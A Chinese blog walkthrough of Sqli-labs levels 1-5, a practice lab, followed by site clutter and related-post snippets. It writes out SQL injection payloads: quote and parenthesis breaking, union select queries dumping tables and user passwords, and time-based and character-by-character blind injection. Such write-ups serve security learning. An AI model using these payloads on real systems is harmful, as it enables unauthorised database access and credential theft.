[新手Sqli-labs]第1-5关

已于 2023-02-05 14:27:24 修改
阅读量127 收藏 1
点赞数
文章标签: sql 数据库
于 2023-01-22 18:47:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63563528/article/details/128749180
版权

目录

Less - 1 基于错误的GET单引号字符型注入

Less - 2 GET-Error based- Intiger based(基于错误的GET整型注入)

Less - 3 GET-Error based- Single quotes with twust string(基于错误的GET单引号变形字符型注入)

Less - 4 GET-Error based- Double Quotse - String(基于错误的GET双引号字符型注入)

Less - 5 GET- Double Injection - Single Quoter -String(双注入GET单引号字符型注入)

Less - 1 基于错误的GET单引号字符型注入

首先我们F12键,用hacbar写入id=1:http://sqli-labs-master:8880/Less-1/?id=1

id 可以显示

那么在后面加单引号,看结果是否报错,要是报错,则存在注入

 结果报错,那我们知道了存在注入

然后我们用order by逐一测试,看他表格有几列:

http://sqli-labs-master:8880/Less-1/?id=1' order by 1 --+;

​ 

​ 

​ 

如图,表格最多有三列 。

然后判断其中第几列有回显,这里要用一个数据库里没有的数字,我用了-1:

http://sqli-labs-master:8880/Less-1/?id=-1' union select 1,2,3--+;

发现2,3列有回显,就可以爆出数据库:

http://sqli-labs-master:8880/Less-1/?id=-1' union select 1,2,database()--+;

 可以看到数据库名字,知道名字就可以查看数据库:

http://sqli-labs-master:8880/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables--+;

爆列:

http://sqli-labs-master:8880/Less-1/?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+;

爆出用户名和密码:

http://sqli-labs-master:8880/Less-1/?id=-1'union select 1,2, group_concat(concat_ws('~',username,password)) from security.users--+;

到此第一关就结束了。

Less - 2 GET-Error based- Intiger based(基于错误的GET整型注入)

以同样的方式,用HacBar写入id=1 ,出现用户名,然后在后面加上单引号:

http://sqli-labs-master:8880/Less-2/?id=1'

看到报错了,再加注释: http://sqli-labs-master:8880/Less-2/?id=1'--+

发现还是报错, 那试试不加单引号:

http://sqli-labs-master:8880/Less-2/?id=1--+

 不加单引号发现可以注入,说明是整型注入,然后之后的操作同第一关。

Less - 3 GET-Error based- Single quotes with twust string(基于错误的GET单引号变形字符型注入)

 以同样的方式,HacBar写入id=1,出现用户名,加单引号,报错:

 加注释符,还是报错:

 猜测语句是id=('$id'),尝试改为?id=1'):

http://sqli-labs-master:8880/Less-3/?id=1')union select 1,2,3--+ 

之后步骤相同。

Less - 4 GET-Error based- Double Quotse - String(基于错误的GET双引号字符型注入)

这里写入id=1出现用户名,然后不断测试,加单引号,单引号括号,都无法闭合,于是尝试双引号:http://sqli-labs-master:8880/Less-4/?id=-1") union select 1,2,3--+

其余的步骤同Less - 1.

Less - 5 GET- Double Injection - Single Quoter -String(双注入GET单引号字符型注入)

用同样的方法进行测试:http://sqli-labs-master:8880/Less-5/?id=1' union select 1,2,3--+

 他始终显示You are in......,无法回显,首先想到布尔盲注,用sleep跑一下:

http://sqli-labs-master:8880/Less-5/?id=1' and sleep(5) --+

发现存在明显延迟,时间延迟型盲注。

逐一的测试数据库名称有几位:http://sqli-labs-master:8880/Less-5/?id=1' and length(database())=1--+

得知名称有8位, 用burp suite抓包,一位一位的爆破名称:

http://sqli-labs-master:8880/Less-5/?id=1' and left(select database(),1)='a'--+

 

 

 第一位为s,以此类推,判断出完整数据库。

7ig3r
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql-labs搭建 完成1-5作业
Lamborxljr的博客
03-03 123
打开根目录找到sql打开sqli-labs-master在里面中找到sqli-connections并以记事本的方式打开db-creds.inc打开后将$dbpass=‘’改为$dbpass=‘root’并保存完成后打开phpstudy,启动Apache和Mysql接着浏览器打开“http://127.0.0.1/sqli-labs-master/”访问首页先点击Setup/reset Database for labs使其自动创建数据库,创建表并填充数据后会出现这样的页面。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs卡5(基于get提交的单引号闭合的报错盲注)通思路
zyh1588的博客
10-25 746
小白对sqli-labs第五的理解,欢迎大佬们来指点迷津
sql-labs学习笔记(1~4)
qq_47704742的博客
09-11 868
本文是从less 3开始记录,前面两 没想起来。提醒:本文适合 了解sql注入且自己通过手工注入方式通过前两的人去看。纯小白看起来可能有难度。
sqli-lab教程——Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)
luosaierdadi的博客
07-06 192
输入单引号,根据报错信息确定咱们输入的内容被原封不动的带入到数据库中,也可叫做数字型注入,就是,把第一题中id=1后面的单引号去掉,其它保持不变就行了。
[网络安全]sqli-labs Less-1 解题详析
等风来
04-27 1959
以上为[网络安全]sqli-labs Less-1 解题详析,后续将分享[网络安全]sqli-labs Less-2 解题详析[网络安全]SQL注入原理及常见攻击方法简析我是秋说,我们下次见。
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs中less-1~4实验详解
mr_secretT的博客
05-26 649
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的数据。这里我们使用的id参数为0,是因为我们需要id参数不存在于数据库的序列号当中,也可以使用负数.通过上述回显,我们可以判定,回显位为第2\3列。4.根据结果我们可以判定这是一个字符型注入漏洞,我们可以得到页面回显。2.从页面回显可以看出,3列数据中,只有2列可以页面回显,我们需要确认一下到底是哪两列会回显呢?我们可以构造语句获取每个。
sqli-labs】 less2 GET - Error based - Intiger based (基于错误的GET整型注入)
ajxi63204的博客
01-18 260
与less1相同,直接走流程 提交参数,直接order by http://localhost/sqli/Less-2/?id=1 order by 1%23 http://localhost/sqli/Less-2/?id=-1 union select 1,2,3%23 http://localhost/sqli/Less-2/?id=-1 uni...
[网络安全]sqli-labs Less-2 解题详析
等风来
05-01 1802
以上为[网络安全]sqli-labs Less-2 解题详析,后续将分享[网络安全]sqli-labs Less-3 解题详析[网络安全]SQL注入原理及常见攻击方法简析我是秋说,我们下次见。
Sqli-Labs靶场(1--5)题详解
weixin_46099095的博客
03-10 4625
目录 一.Less-1:GET - Error based - Single quotes -String(GET - 基于错误 - 单引号 - 字符串) 一、判断注入点 二、确认列数 三、使用Union select 进行查询 四、爆破所有数据库名以及当前数据库名 五、爆破security数据库内的所有表名 六、爆破users表内的所有列名 七、查询所有的用户名,密码 二.Less-2:GET - Error based - Intiger based(GET - 基于错误 -..
sqli-labs第五、六(详细)
TA不懒,但还没有添加简介
09-09 708
sqli-labs第五(详细)
sqli注入--利用information_schema配合双查询报错注入
weixin_30779691的博客
01-18 303
目录 sqli-labs 5、6双查询报错注入通 0x01 获取目标库名 0x02 获取库中表的数量 0x03 获取库中表名 0x04 获取目标表中的列数 0x05 获取目标表的列名 0x06 从列中获取用户名 0x07 获取对应的...
sqli靶场练习第五
weixin_48042647的博客
04-26 966
sqli-labs靶场第五-盲注详解 现在一般情况下,大多数的网站都不会将错误回显出来,这时候我们是不知道有注入点,以及得到相信息的。这个时候就需要我们判断是否存在注入,若存在注入那么这时候就需要采取盲注的方式来获得数据。 盲注又分为Boolean盲注和时间型盲注,本要讲的是Boolean盲注。 Boolean盲注是基于真假的判断,它有几种判断方式: 通过长度判断:length():length(database())>=x 通过字符判断:substr():substr(database(),1
PostgreSQL 中如何解决因大量并发删除和插入操作导致的索引抖动?
最新发布
技术笔记
07-17 663
索引抖动是 PostgreSQL 中一个常见的问题,它会对数据库的性能产生严重的影响。通过采用批量操作、分区表、索引优化和调整数据库参数等方法,我们可以有效地解决索引抖动问题,提高数据库的性能和稳定性。在实际应用中,我们应该根据具体情况选择合适的解决方案,并不断地进行优化和调整,以满足业务的需求。解决索引抖动问题就像是一场战斗,我们需要根据敌人(问题)的特点和弱点,选择合适的武器(解决方案),并灵活运用战术(优化方法),才能取得最终的胜利。
国产精品ORM框架-SqlSugar详解 SqlSugar初识 附案例源码 云草桑 专题一
cao919的专栏Net
07-13 767
国产精品ORM框架-SqlSugar详解 1、SqlSugar初识 2、开始实操 3、增删改操作 4、进阶功能 5优美的表达式、仓储、UnitOfWork、DbContext、AOP `代码先行,先有代码,然后有数据库,只注业务,业务中的对象如果需要就直接创建实体,对应的数。简单易用、功能齐全、高性能、轻量级、服务齐全、官网教程文档、有专业技术支持一天18小时。支持 完整的SAAS一套应用 跨库查询 、租户分库 、租户分表 和 租户数据隔离。数据库的结构完全由代码来决定,数据库表--主键、自增,字段类型。
sqli-labs第一详情解答
09-14
对于sqli-labs的第一,我们需要利用SQL注入漏洞来绕过登录验证,以下是详细解答: 1. 打开sqli-labs的网址,进入第一页面。 2. 在登录框中输入任意用户名和密码,点击登录按钮。 3. 在跳转的页面中,我们可以看到URL中的参数"id"的值,比如:http://localhost/sqli-labs/Less-1/?id=1。我们需要利用这个参数进行注入。 4. 在id参数后面添加单引号('),并在URL末尾添加注释符(--)使其变为注释,比如:http://localhost/sqli-labs/Less-1/?id=1'--。 5. 点击回车进行页面访问,如果页面中显示出了登录成功的提示信息,说明我们成功地绕过了登录验证。 6. 通过这个注入点,我们可以进一步尝试使用其他常见的SQL注入技巧来获取更多信息或者执行进一步的攻击。 需要注意的是,在真实环境中,执行SQL注入攻击是违法行为,请仅在合法授权范围内进行相测试和学习。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值